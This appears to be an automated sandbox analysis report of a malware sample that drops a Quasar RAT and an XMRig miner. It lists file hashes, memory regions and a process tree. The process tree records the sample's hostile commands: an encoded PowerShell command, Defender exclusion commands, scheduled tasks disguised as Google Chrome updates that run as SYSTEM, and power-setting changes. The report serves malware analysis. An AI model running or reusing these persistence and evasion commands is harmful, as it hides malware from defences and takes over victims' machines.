| SHA1 | bc94a8ff462547ab48c2fbf705673a1552545b76 |
| SHA256 | 3e6e9fc56e1a9fe5edb39ee03e5d47fa0e3f6adb17be1f087dc6f891d3b0bbca |
| SHA512 | 371aa8e5c722307fff65e00968b14280ee5046cfcf4a1d9522450688d75a3b0362f2c9ec0ec117b2fc566664f2f52a1b47fe62f28466488163f9f0f1ce367f86 |
C:\Users\Admin\AppData\Local\Temp\_MEI52442\_ssl.pyd
| MD5 | 2089768e25606262921e4424a590ff05 |
| SHA1 | bc94a8ff462547ab48c2fbf705673a1552545b76 |
| SHA256 | 3e6e9fc56e1a9fe5edb39ee03e5d47fa0e3f6adb17be1f087dc6f891d3b0bbca |
| SHA512 | 371aa8e5c722307fff65e00968b14280ee5046cfcf4a1d9522450688d75a3b0362f2c9ec0ec117b2fc566664f2f52a1b47fe62f28466488163f9f0f1ce367f86 |
C:\Users\Admin\AppData\Local\Temp\_MEI52442\libssl-1_1.dll
| MD5 | 8e8a145e122a593af7d6cde06d2bb89f |
| SHA1 | b0e7d78bb78108d407239e9f1b376e0c8c295175 |
| SHA256 | a6a14c1beccbd4128763e78c3ec588f747640297ffb3cc5604a9728e8ef246b1 |
| SHA512 | d104d81aca91c067f2d69fd8cec3f974d23fb5372a8f2752ad64391da3dbf5ffe36e2645a18a9a74b70b25462d73d9ea084318846b7646d39ce1d3e65a1c47c4 |
C:\Users\Admin\AppData\Local\Temp\_MEI52442\libssl-1_1.dll
| MD5 | 8e8a145e122a593af7d6cde06d2bb89f |
| SHA1 | b0e7d78bb78108d407239e9f1b376e0c8c295175 |
| SHA256 | a6a14c1beccbd4128763e78c3ec588f747640297ffb3cc5604a9728e8ef246b1 |
| SHA512 | d104d81aca91c067f2d69fd8cec3f974d23fb5372a8f2752ad64391da3dbf5ffe36e2645a18a9a74b70b25462d73d9ea084318846b7646d39ce1d3e65a1c47c4 |
memory/2988-133-0x00000000752C0000-0x0000000075A70000-memory.dmp
memory/324-136-0x000000001B5B0000-0x000000001B5C0000-memory.dmp
memory/2636-137-0x00007FF89D420000-0x00007FF89D439000-memory.dmp
memory/2636-138-0x00007FF8AB380000-0x00007FF8AB38D000-memory.dmp
memory/2636-139-0x00007FF89B960000-0x00007FF89BA18000-memory.dmp
memory/2988-142-0x0000000000C40000-0x0000000000CB6000-memory.dmp
memory/6044-143-0x000001BBD86C0000-0x000001BBD86D0000-memory.dmp
memory/6044-144-0x000001BBD86C0000-0x000001BBD86D0000-memory.dmp
memory/2636-146-0x00007FF89C1F0000-0x00007FF89C21E000-memory.dmp
memory/2988-147-0x0000000005D30000-0x00000000062D4000-memory.dmp
memory/2636-145-0x00007FF898920000-0x00007FF898A97000-memory.dmp
memory/2988-148-0x0000000005780000-0x0000000005812000-memory.dmp
memory/2636-141-0x00007FF897500000-0x00007FF897878000-memory.dmp
memory/2636-140-0x00000181DE650000-0x00000181DE9C8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI52442\libcrypto-1_1.dll
| MD5 | dffcab08f94e627de159e5b27326d2fc |
| SHA1 | ab8954e9ae94ae76067e5a0b1df074bccc7c3b68 |
| SHA256 | 135b115e77479eedd908d7a782e004ece6dd900bb1ca05cc1260d5dd6273ef15 |
| SHA512 | 57e175a5883edb781cdb2286167d027fdb4b762f41fb1fc9bd26b5544096a9c5dda7bccbb6795dcc37ed5d8d03dc0a406bf1a59adb3aeb41714f1a7c8901a17d |
C:\Users\Admin\AppData\Local\Temp\_MEI52442\libcrypto-1_1.dll
| MD5 | dffcab08f94e627de159e5b27326d2fc |
| SHA1 | ab8954e9ae94ae76067e5a0b1df074bccc7c3b68 |
| SHA256 | 135b115e77479eedd908d7a782e004ece6dd900bb1ca05cc1260d5dd6273ef15 |
| SHA512 | 57e175a5883edb781cdb2286167d027fdb4b762f41fb1fc9bd26b5544096a9c5dda7bccbb6795dcc37ed5d8d03dc0a406bf1a59adb3aeb41714f1a7c8901a17d |
memory/6044-149-0x000001BBF0B30000-0x000001BBF0C7E000-memory.dmp
memory/2636-152-0x00007FF896340000-0x00007FF896929000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI52442\_queue.pyd
| MD5 | decdabaca104520549b0f66c136a9dc1 |
| SHA1 | 423e6f3100013e5a2c97e65e94834b1b18770a87 |
| SHA256 | 9d4880f7d0129b1de95becd8ea8bbbf0c044d63e87764d18f9ec00d382e43f84 |
| SHA512 | d89ee3779bf7d446514fc712dafb3ebc09069e4f665529a7a1af6494f8955ceb040bef7d18f017bcc3b6fe7addeab104535655971be6eed38d0fc09ec2c37d88 |
C:\Users\Admin\AppData\Local\Temp\_MEI52442\_queue.pyd
| MD5 | decdabaca104520549b0f66c136a9dc1 |
| SHA1 | 423e6f3100013e5a2c97e65e94834b1b18770a87 |
| SHA256 | 9d4880f7d0129b1de95becd8ea8bbbf0c044d63e87764d18f9ec00d382e43f84 |
| SHA512 | d89ee3779bf7d446514fc712dafb3ebc09069e4f665529a7a1af6494f8955ceb040bef7d18f017bcc3b6fe7addeab104535655971be6eed38d0fc09ec2c37d88 |
C:\Users\Admin\AppData\Local\Temp\_MEI52442\_hashlib.pyd
| MD5 | f10d896ed25751ead72d8b03e404ea36 |
| SHA1 | eb8e0fd6e2356f76b5ea0cb72ab37399ec9d8ecb |
| SHA256 | 3660b985ca47ca1bba07db01458b3153e4e692ee57a8b23ce22f1a5ca18707c3 |
| SHA512 | 7f234e0d197ba48396fabd1fccc2f19e5d4ad922a2b3fe62920cd485e5065b66813b4b2a2477d2f7f911004e1bc6e5a6ec5e873d8ff81e642fee9e77b428fb42 |
C:\Users\Admin\AppData\Local\Temp\_MEI52442\_hashlib.pyd
| MD5 | f10d896ed25751ead72d8b03e404ea36 |
| SHA1 | eb8e0fd6e2356f76b5ea0cb72ab37399ec9d8ecb |
| SHA256 | 3660b985ca47ca1bba07db01458b3153e4e692ee57a8b23ce22f1a5ca18707c3 |
| SHA512 | 7f234e0d197ba48396fabd1fccc2f19e5d4ad922a2b3fe62920cd485e5065b66813b4b2a2477d2f7f911004e1bc6e5a6ec5e873d8ff81e642fee9e77b428fb42 |
memory/2636-155-0x00007FF89D440000-0x00007FF89D463000-memory.dmp
memory/2988-160-0x00000000056B0000-0x00000000056BA000-memory.dmp
memory/2636-162-0x00007FF89C310000-0x00007FF89C333000-memory.dmp
memory/2636-164-0x00007FF89D420000-0x00007FF89D439000-memory.dmp
memory/2636-166-0x00007FF89C1F0000-0x00007FF89C21E000-memory.dmp
memory/2636-167-0x00007FF89B960000-0x00007FF89BA18000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI52442\unicodedata.pyd
| MD5 | c2556dc74aea61b0bd9bd15e9cd7b0d6 |
| SHA1 | 05eff76e393bfb77958614ff08229b6b770a1750 |
| SHA256 | 987a6d21ce961afeaaa40ba69859d4dd80d20b77c4ca6d2b928305a873d6796d |
| SHA512 | f29841f262934c810dd1062151aefac78cd6a42d959a8b9ac832455c646645c07fd9220866b262de1bc501e1a9570591c0050d5d3607f1683437dea1ff04c32b |
memory/2636-168-0x00007FF897500000-0x00007FF897878000-memory.dmp
memory/2636-169-0x00007FF89B920000-0x00007FF89B934000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI52442\unicodedata.pyd
| MD5 | c2556dc74aea61b0bd9bd15e9cd7b0d6 |
| SHA1 | 05eff76e393bfb77958614ff08229b6b770a1750 |
| SHA256 | 987a6d21ce961afeaaa40ba69859d4dd80d20b77c4ca6d2b928305a873d6796d |
| SHA512 | f29841f262934c810dd1062151aefac78cd6a42d959a8b9ac832455c646645c07fd9220866b262de1bc501e1a9570591c0050d5d3607f1683437dea1ff04c32b |
memory/5144-170-0x00007FF74C820000-0x00007FF7500AE000-memory.dmp
memory/2988-172-0x0000000005770000-0x0000000005780000-memory.dmp
memory/2636-173-0x00007FF8A7F10000-0x00007FF8A7F1D000-memory.dmp
memory/2636-174-0x00007FF8973E0000-0x00007FF8974FC000-memory.dmp
memory/6028-184-0x00007FF8A13A0000-0x00007FF8A1E61000-memory.dmp
memory/6028-185-0x0000010FDA470000-0x0000010FDA480000-memory.dmp
memory/6028-186-0x0000010FDA470000-0x0000010FDA480000-memory.dmp
memory/6024-197-0x00000250D5D70000-0x00000250D5D80000-memory.dmp
memory/6024-198-0x00000250D5D70000-0x00000250D5D80000-memory.dmp
memory/2636-199-0x00007FF896340000-0x00007FF896929000-memory.dmp
memory/2988-200-0x0000000005770000-0x0000000005780000-memory.dmp
memory/6028-201-0x0000010FDA470000-0x0000010FDA480000-memory.dmp
memory/6024-202-0x00000250D5D70000-0x00000250D5D80000-memory.dmp
memory/6024-196-0x00007FF8A13A0000-0x00007FF8A1E61000-memory.dmp
memory/2636-208-0x00007FF89C340000-0x00007FF89C36D000-memory.dmp
memory/2636-210-0x00007FF89D840000-0x00007FF89D859000-memory.dmp
memory/2636-211-0x00007FF89C310000-0x00007FF89C333000-memory.dmp
memory/6044-209-0x000001BBF0B30000-0x000001BBF0C7E000-memory.dmp
memory/2636-205-0x00007FF8ACA00000-0x00007FF8ACA0F000-memory.dmp
memory/2636-204-0x00007FF89D440000-0x00007FF89D463000-memory.dmp
memory/2636-203-0x00007FF896340000-0x00007FF896929000-memory.dmp
memory/6044-212-0x00007FF8A13A0000-0x00007FF8A1E61000-memory.dmp
memory/2636-214-0x00007FF898920000-0x00007FF898A97000-memory.dmp
memory/2636-216-0x00007FF89D420000-0x00007FF89D439000-memory.dmp
memory/2636-218-0x00007FF8AB380000-0x00007FF8AB38D000-memory.dmp
memory/2636-220-0x00007FF89C1F0000-0x00007FF89C21E000-memory.dmp
memory/2636-221-0x00007FF89B960000-0x00007FF89BA18000-memory.dmp
memory/2636-223-0x00007FF897500000-0x00007FF897878000-memory.dmp
memory/2636-225-0x00007FF89B920000-0x00007FF89B934000-memory.dmp
memory/2636-227-0x00007FF8A7F10000-0x00007FF8A7F1D000-memory.dmp
memory/2636-229-0x00007FF8973E0000-0x00007FF8974FC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI52442\blank.aes
| MD5 | 07b71b817dd774c5f88c5526790fcbc9 |
| SHA1 | 6000351cb67edf2275b1b499e0fb01bbe693b1f2 |
| SHA256 | 8f0927d471642856553a04b32a6527b9deebdfcaadc5b0b6f91cf7fc5cb66038 |
| SHA512 | 295fa6d16b15a7b425ec4031f05e34ec159ca0129a5a59ca8b0c6fd146d809fc9834e1eccb8f1aa3ffb8b87bc9ba63bb6688b596b22b92e03f053297e16a6b0d |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
memory/5144-233-0x00007FF74C820000-0x00007FF7500AE000-memory.dmp
memory/6028-239-0x0000010FDA5B0000-0x0000010FDA6FE000-memory.dmp
memory/6024-240-0x00000250D5E80000-0x00000250D5FCE000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 9611cc3fb39fedd4b0e81d90b044531c |
| SHA1 | e35c10c1c1e29d44222114e0f72d58b3072880fd |
| SHA256 | 2090eae25be03e07ff54e5ab9d219902fb80e8c1f6fe52e73c9a4afcf5eec5ec |
| SHA512 | 92cf8fdd0353dd1e04856b6642483ac426ea32113a0b7436cf8224623912ae2f31078c7e70cef1c67f859504bd29e05f9af69f06533725e57244063e89e4954d |
memory/1216-254-0x000001BC5E360000-0x000001BC5E370000-memory.dmp
memory/1216-252-0x00007FF8A13A0000-0x00007FF8A1E61000-memory.dmp
memory/1216-253-0x000001BC5E360000-0x000001BC5E370000-memory.dmp
memory/1216-255-0x000001BC5E360000-0x000001BC5E370000-memory.dmp
memory/6028-258-0x0000010FDA470000-0x0000010FDA480000-memory.dmp
memory/1216-261-0x000001BC5E360000-0x000001BC5E370000-memory.dmp
memory/6028-263-0x0000010FDA5B0000-0x0000010FDA6FE000-memory.dmp
memory/1216-268-0x000001BC76AC0000-0x000001BC76C0E000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5cfe303e798d1cc6c1dab341e7265c15 |
| SHA1 | cd2834e05191a24e28a100f3f8114d5a7708dc7c |
| SHA256 | c4d16552769ca1762f6867bce85589c645ac3dc490b650083d74f853f898cfab |
| SHA512 | ef151bbe0033a2caf2d40aff74855a3f42c8171e05a11c8ce93c7039d9430482c43fe93d9164ee94839aff253cad774dbf619dde9a8af38773ca66d59ac3400e |
memory/1216-269-0x00007FF8A13A0000-0x00007FF8A1E61000-memory.dmp
memory/324-270-0x00007FF8A13A0000-0x00007FF8A1E61000-memory.dmp
memory/3768-271-0x00007FF8A13A0000-0x00007FF8A1E61000-memory.dmp
memory/3768-272-0x0000021827CB0000-0x0000021827CC0000-memory.dmp
memory/2988-273-0x00000000752C0000-0x0000000075A70000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 5cfe303e798d1cc6c1dab341e7265c15 |
| SHA1 | cd2834e05191a24e28a100f3f8114d5a7708dc7c |
| SHA256 | c4d16552769ca1762f6867bce85589c645ac3dc490b650083d74f853f898cfab |
| SHA512 | ef151bbe0033a2caf2d40aff74855a3f42c8171e05a11c8ce93c7039d9430482c43fe93d9164ee94839aff253cad774dbf619dde9a8af38773ca66d59ac3400e |
memory/324-284-0x000000001B5B0000-0x000000001B5C0000-memory.dmp
memory/6028-265-0x00007FF8A13A0000-0x00007FF8A1E61000-memory.dmp
memory/6024-262-0x00007FF8A13A0000-0x00007FF8A1E61000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 77d622bb1a5b250869a3238b9bc1402b |
| SHA1 | d47f4003c2554b9dfc4c16f22460b331886b191b |
| SHA256 | f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb |
| SHA512 | d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9 |
memory/6024-257-0x00000250D5E80000-0x00000250D5FCE000-memory.dmp
memory/5144-285-0x00007FF74C820000-0x00007FF7500AE000-memory.dmp
memory/3768-286-0x0000021840450000-0x000002184059E000-memory.dmp
memory/3768-288-0x0000021840450000-0x000002184059E000-memory.dmp
memory/3768-293-0x0000021840450000-0x000002184059E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\mainPannel.exe
| MD5 | 4bcdea1ce4588a550b35ddfd88ffe867 |
| SHA1 | 79319590abb95dfbbe7ec789d78531655e75a61b |
| SHA256 | ac46c917eecdbe5bfff12244f3e1afbf5c42b2bfd1e46dce854956b5f7230e8e |
| SHA512 | df391b0c10d5857d687a585d875d9189088d6529812643aabca3cfced00eb275edae00e8877fefef30151eb9ba37aafd6ce902261258d46a4fdd7eeb685edc4f |
memory/5144-298-0x00007FF74C820000-0x00007FF7500AE000-memory.dmp
C:\Program Files\Google\Chrome\updater.exe
| MD5 | 4bcdea1ce4588a550b35ddfd88ffe867 |
| SHA1 | 79319590abb95dfbbe7ec789d78531655e75a61b |
| SHA256 | ac46c917eecdbe5bfff12244f3e1afbf5c42b2bfd1e46dce854956b5f7230e8e |
| SHA512 | df391b0c10d5857d687a585d875d9189088d6529812643aabca3cfced00eb275edae00e8877fefef30151eb9ba37aafd6ce902261258d46a4fdd7eeb685edc4f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 00a455d9d155394bfb4b52258c97c5e5 |
| SHA1 | 2761d0c955353e1982a588a3df78f2744cfaa9df |
| SHA256 | 45a13c77403533b12fbeeeb580e1c32400ca17a32e15caa8c8e6a180ece27fed |
| SHA512 | 9553f8553332afbb1b4d5229bbf58aed7a51571ab45cbf01852b36c437811befcbc86f80ec422f222963fa7dabb04b0c9ae72e9d4ff2eeb1e58cde894fbe234f |
memory/4988-310-0x00007FF743D20000-0x00007FF7475AE000-memory.dmp
memory/4988-337-0x00007FF743D20000-0x00007FF7475AE000-memory.dmp
memory/5644-346-0x00000240BD0F0000-0x00000240BD23E000-memory.dmp
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | bdb25c22d14ec917e30faf353826c5de |
| SHA1 | 6c2feb9cea9237bc28842ebf2fea68b3bd7ad190 |
| SHA256 | e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495 |
| SHA512 | b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c |
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | b42c70c1dbf0d1d477ec86902db9e986 |
| SHA1 | 1d1c0a670748b3d10bee8272e5d67a4fabefd31f |
| SHA256 | 8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a |
| SHA512 | 57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5 |
memory/2508-375-0x0000029AF7250000-0x0000029AF739E000-memory.dmp
C:\Program Files\Google\Chrome\updater.exe
| MD5 | 4bcdea1ce4588a550b35ddfd88ffe867 |
| SHA1 | 79319590abb95dfbbe7ec789d78531655e75a61b |
| SHA256 | ac46c917eecdbe5bfff12244f3e1afbf5c42b2bfd1e46dce854956b5f7230e8e |
| SHA512 | df391b0c10d5857d687a585d875d9189088d6529812643aabca3cfced00eb275edae00e8877fefef30151eb9ba37aafd6ce902261258d46a4fdd7eeb685edc4f |
memory/4340-382-0x000002E6FED50000-0x000002E6FED70000-memory.dmp
memory/4988-381-0x00007FF743D20000-0x00007FF7475AE000-memory.dmp
memory/5188-383-0x00007FF70F980000-0x00007FF70F9AA000-memory.dmp
memory/4340-384-0x00007FF632C30000-0x00007FF63341F000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2023-09-10 03:56
Reported
2023-09-10 04:02
Platform
win7-20230831-en
Max time kernel
151s
Max time network
166s
Command Line
Signatures
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 2540 created 1280 | N/A | C:\Users\Admin\AppData\Local\Temp\mainPannel.exe | C:\Windows\Explorer.EXE |
| PID 2540 created 1280 | N/A | C:\Users\Admin\AppData\Local\Temp\mainPannel.exe | C:\Windows\Explorer.EXE |
| PID 2540 created 1280 | N/A | C:\Users\Admin\AppData\Local\Temp\mainPannel.exe | C:\Windows\Explorer.EXE |
| PID 2540 created 1280 | N/A | C:\Users\Admin\AppData\Local\Temp\mainPannel.exe | C:\Windows\Explorer.EXE |
| PID 1996 created 1280 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\Explorer.EXE |
| PID 1996 created 1280 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\Explorer.EXE |
| PID 1996 created 1280 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\Explorer.EXE |
| PID 1996 created 1280 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\Explorer.EXE |
| PID 1996 created 1280 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\Explorer.EXE |
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Logger.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Logger.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\mainPannel.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\UI.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\GC.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\updater.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ImageLoggerV12.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Logger.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Logger.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ImageLoggerV12.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\system32\taskeng.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1996 set thread context of 1524 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\System32\conhost.exe |
| PID 1996 set thread context of 1896 | N/A | C:\Program Files\Google\Chrome\updater.exe | C:\Windows\System32\cmd.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\Google\Chrome\updater.exe | C:\Users\Admin\AppData\Local\Temp\mainPannel.exe | N/A |
| File created | C:\Program Files\Google\Libs\WR64.sys | C:\Program Files\Google\Chrome\updater.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 7056e7609be3d901 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\ImageLoggerV12.exe
"C:\Users\Admin\AppData\Local\Temp\ImageLoggerV12.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHYAawBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAdgB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAeABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAegBsACMAPgA="
C:\Users\Admin\AppData\Roaming\Logger.exe
"C:\Users\Admin\AppData\Roaming\Logger.exe"
C:\Users\Admin\AppData\Roaming\Logger.exe
"C:\Users\Admin\AppData\Roaming\Logger.exe"
C:\Users\Admin\AppData\Local\Temp\mainPannel.exe
"C:\Users\Admin\AppData\Local\Temp\mainPannel.exe"
C:\Users\Admin\AppData\Local\Temp\UI.exe
"C:\Users\Admin\AppData\Local\Temp\UI.exe"
C:\Users\Admin\AppData\Local\Temp\GC.exe
"C:\Users\Admin\AppData\Local\Temp\GC.exe"
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Google Chrome" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe
"C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "Google Chrome" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe" /rl HIGHEST /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ooufdlmmm#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
C:\Windows\system32\taskeng.exe
taskeng.exe {7BB91E59-794E-46F2-84A1-8A088423A2F2} S-1-5-18:NT AUTHORITY\System:Service:
C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
